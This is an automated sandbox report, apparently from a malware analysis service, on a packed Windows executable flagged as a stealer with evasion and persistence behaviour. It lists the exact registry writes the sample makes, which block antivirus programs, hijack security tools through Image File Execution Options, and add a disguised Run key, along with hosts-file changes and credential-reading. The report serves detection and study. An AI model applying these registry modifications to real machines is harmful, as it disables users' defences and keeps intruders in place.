07a6b264f4c2b652f76a7bc65b19d4a4590bf38ed7bc5d8befdc014040210719

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
21-09-2024 00:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Size

2.6MB
MD5

eeb864d76675ad5171e9c9b0373b0620
SHA1

0a09d65356f41e62f25d6709b619d293096c3afd
SHA256

07a6b264f4c2b652f76a7bc65b19d4a4590bf38ed7bc5d8befdc014040210719
SHA512

6e298c0aee1c02d2a0ca8b384a34400a12a9505fcc4138dc143ff6f0e1723e7a10a7ba2121fdf1157e461c927b7330618ab652defbf7cfe82bf406eff6cf4939
SSDEEP

49152:7E+stNddv/eA7F/DAw/Ci1SODfOl0XcVxY/Sd58p9+fFd:7EVtNdh/eA7F8QcODAEcVCa58H+f7

Score

9^/10

bootkit discovery evasion persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Blocks application from running via registry modification 18 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\0 = "msseces.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "egui.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "avcenter.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "avgcmgr.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "avgwdsvc.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MSASCui.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "avgnt.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "avscan.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "avgfrw.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "avgcfgex.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "avgemc.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "avgchsvx.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "avgtray.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "avgui.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "avgscanx.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "ekrn.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Drops file in Drivers directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\host_new	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File created	C:\Windows\system32\drivers\etc\host_new	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File created	C:\Windows\System32\drivers\etc\hosts	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nt.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\deloeminfs.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconsol.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\neowatchlog.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vswin9xe.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpcc.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\deputy.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drwebupw.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashChest.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vptray.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusXP	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winservn.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfpupdat.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcshell.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\watchdog.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcproxy.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmgrdian.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nvarch16.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\istsvc.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dvp95_0.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autotrace.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-prot.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hotactio.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchostc.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vet95.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cssurf.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msa.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MalwareRemoval.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mrt.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drweb32.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symtray.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install[4].exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Cl.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VisthUpd.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nwservice.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winav.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibmavsp.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bidef.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fameh32.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\showbehind.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Identity.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssmmc32.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navw32.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\personalguard\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-prot95.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gmt.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iedriver.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmod.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ostronet.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Anti-Virus Professional.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmon016.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Cl.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcshield.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\defalert.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\save.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\window.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wintsk32.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SafetyKeeper.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aplica32.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp32.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/228-0-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-3-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-4-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-5-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-265-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-268-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-267-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-266-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-273-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-275-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-276-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-283-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-284-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-285-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-307-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-310-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-327-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-381-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-384-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-331-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-382-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-380-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-334-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-309-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-306-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-396-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-397-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-398-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-417-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-418-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-419-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-421-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-432-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-433-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-435-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-445-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-446-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-447-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-448-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-459-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-540-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-541-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-542-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-634-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-636-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-649-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-651-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-652-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-647-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-646-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-645-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-642-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-643-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-653-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-654-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-1410-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-1411-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-1412-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral2/memory/228-1413-0x0000000013140000-0x0000000013746000-memory.dmp	upx

Unexpected DNS network traffic destination 36 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Internet Security Essentials = "\"C:\\ProgramData\\75d0f\\ISeb2.exe\" /s /d"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Eset\Nod\	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 21 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\M:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\T:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\X:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\E:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\G:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\H:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\L:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\I:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\K:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\Z:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\J:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\R:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\U:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\W:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\S:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\V:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\Y:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
